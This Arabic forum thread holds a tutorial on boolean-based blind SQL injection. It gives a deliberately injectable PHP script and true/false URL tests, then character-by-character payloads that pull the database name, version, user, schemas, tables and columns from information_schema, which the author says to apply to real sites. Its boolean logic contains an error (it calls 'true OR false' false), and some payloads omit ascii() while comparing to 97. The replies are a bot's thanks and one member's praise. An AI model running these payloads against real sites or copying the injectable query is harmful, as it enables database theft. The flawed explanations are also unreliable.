الوسوم:
حالة الموضوع:
مغلق
  1. ŦђĘ βě$Ţ

    ŦђĘ βě$Ţ Developer

    الأنتساب:
    ‏4 مارس 2013
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [​IMG]




    boolean-based blind sql injection


    نوع من انواع ثغرات سكيول


    مثال:


    كود PHP:
    <?php
    mysql_connect
    ('localhost','user','pass');
    mysql_select_db('sql_test');

    $reponse=mysql_query("select * from dz where `nom` like '%".$_GET['sql']."%' ");
    if(!
    mysql_num_rows($reponse)==0){
    echo 
    "dz";
    };

    ?>


    السكربت يتصل بقاعدة البيانات و تجلب النتيجة اذا وجدت يطبع


    dz


    كما نلاحظ


    http://site.com/index.php?sql=1


    النتيجة


    كود:
    dz

    لو اضفنا and 1=1

    ******************************************
    http://site.com/index.php?sql=1 and 1=1

    (sql=1) ==>صحيح
    (1=1) ==>صحيح
    صحيح و صحيح يساوي صحيح
    اذن تطبع كلمة dz
    ******************************************
    http://site.com/index.php?sql=1 and 1=0

    (sql=1) ==>صحيح
    (0=1) ==>خطأ
    صحيح و خطأيساوي خطأ
    اذن لا تطبع كلمة dz

    ********************************************
    [WARNING]http://site.com/index.php?sql=1 or 1=0[/WARNING]

    (sql=1) ==>صحيح
    (0=1) ==>خطأ
    صحيح او خطأيساوي خطأ
    اذن تطبع كلمة dz


    ******************************************
    في المواقع
    تكون بملاحظة اختلاف بعد وضع سلاش / او '
    او اضافة استعلام خاطئ

    ننتقل الى المهم اوامر استخراج البيانات

    كود PHP:
    and ascii(substring (sql,1,1))=0
    substring
    هذا الاستعلام لتقسيم رد قاعدة البيانات
    substring (sql,x,y)
    x:الرتبة
    y:درجة التقسيم اذا كان 1 معناها وحدة وحدة
    ثم نشفر هذا الجزء بال ascii
    ثم المقاربة باستخدام
    = > <
    بستعمل الحصر لنجد الحرف بسرعة

    اذا تم طباعة dz كم في المثال معناها الاستعلام صحيح


    ******************************************
    استخراج اسم القاعدة

    كود PHP:
    and ascii(substring (database(),1,1))=0
    .
    .
    .
    .
    and substring (database(),1,1)=97 ==> صحيح


    اول حرف من القاعدة هو a
    ascii(a)=97
    اذا 97=97 ===> صحيح
    ننتقل الى الحرف الثاني
    كود PHP:
    and substring (database(),2,1)=0
    و هكذااااااااااااا

    ******************************************
    اصدار القاعدة

    كود PHP:
    and ascii(substring (version(),1,1))=0
    ******************************************
    اسم مستخدم القاعدة

    كود PHP:
    and ascii(substring (user(),1,1))=0
    ******************************************

    استخراج قواعد البيانات

    كود PHP:
    and ascii(substring ((select schema_name from information_schema.schemata),1,1))=0

    ******************************************
    استخراج اسماء الجداول
    كود PHP:
    and ascii(substring ((select table_name from information_schema.tables),1,1))=0
    ******************************************
    استخراج الاعمدة
    كود PHP:
    and ascii(substring ((select column_name from information_schema.columns),1,1))=0
    ******************************************

    تكمن استخدام جميع اوامر الشل سكيول
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ريلاكس ياقلبي

    ريلاكس ياقلبي Active DeveloPer

    الأنتساب:
    ‏12 نوفمبر 2012
    المشاركات:
    94
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    رد: boolean-based blind sql injection

    يعطيك آلعـأفية يآ وحش
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة